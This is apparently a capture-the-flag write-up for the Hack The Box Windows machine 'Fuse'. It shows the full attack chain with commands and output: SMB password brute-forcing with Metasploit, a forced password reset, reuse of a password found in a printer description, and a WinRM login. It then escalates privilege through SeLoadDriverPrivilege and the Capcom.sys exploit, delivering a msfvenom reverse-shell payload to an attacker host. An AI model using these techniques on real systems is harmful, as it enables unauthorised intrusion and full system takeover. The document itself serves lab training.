Author Ikonw

nmap

# Nmap 7.80 scan initiated Wed Sep  2 03:57:19 2020 as: nmap -Pn -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49675,49676,49680,49698 -oN nmap/Full_10.10.10.193.nmap 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.0079s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-02 08:10:26Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/2%Time=5F4F506B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m00s, deviation: 4h02m32s, median: 12m58s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-09-02T01:12:45-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-02T08:12:42
|_  start_date: 2020-09-02T08:04:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  2 04:01:52 2020 -- 1 IP address (1 host up) scanned in 273.40 seconds

We get the FQDN from the smb-os-discovery script

add it to the /etc/hosts

I like to enumerate smb ports first

┌──(root💀kali)-[~]
└─# enum4linux Fuse.fabricorp.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep  7 11:02:19 2020

However it didnt give me any critical information, anonymous login didnt get me anything too

┌──(root💀kali)-[~]
└─# smbclient -L 10.10.10.193                                                       
Enter WORKGROUP\root's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Start investigate the web, it’s a papercut CMS if im not wrong.

Found some user in each print logs

We collect all the user

pmerton
tlavel
sthompson
bhult
administrator

According to previous box such as sauna.

The entry point most likely is to collect user and password from the web server and brute force on smb ports.

Therefore we use cewl to make a collection of password dictionary.

cewl -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm -m3 --with-numbers

Launch msfconsole use the smb_login module to bruteforce

msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE user
USER_FILE => user
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE wordlist
PASS_FILE => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain fabricorp.local
smbdomain => fabricorp.local
msf5 auxiliary(scanner/smb/smb_login) > run

successfully got 2 creds

[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: 'fabricorp.local\tlavel:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: 'fabricorp.local\bhult:Fabricorp01'

Trying login to smb server, but was prompt with error which I never meet. Both account have the same problem

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U tlavel           
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
                                                                                                                   
┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U bhult                                                                         
Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

After some google,find out I can use smbpasswd to change the password

There seems some password policy, so I change the password to Fabricop011 for both accout

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbpasswd -r 10.10.10.193 -U tlavel                                                                        
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

After some enumeration on rpcclient and password $fab@s3Rv1ce$1

found some username

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and one password

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

and we try to login to windows using this credentials.

Went back to to msfconsole, we lanuch win_rm module to brute force the username against the password

and we got the creds svc-print:$fab@s3Rv1ce$1

use evil-winrm to login

┌──(root💀kali)-[/opt/evil-winrm]
└─# ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p \$fab@s3Rv1ce\$1                                           1 ⨯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


    Directory: C:\Users\svc-print


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         6/1/2020   1:45 AM                Desktop
d-r---        5/31/2020   5:20 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/7/2020  12:35 AM             34 user.txt

Root

After getting root, check user’s privilege

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

seLoadDrivePrivilege is enabled

Abusing SeLoadDriverPrivilege for privilege escalation

This site is a good reference for SeLoadDriverPrivilege escalation

EopLoaddriver

Capcom.sys

ExploitCapcom

open up the ExploitCapcom.cpp file, modify the Launch shell function. Change the commandLine[] targeted to a meterpreter.exe and compile it.

Next we have to generate a meterpreter.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=1234 -f exe > meterpreter.exe

Create a folder called temp in C:\

and upload all the 4 files to the target server.

*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002841CC20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And we got the meterpreter session on our multi handler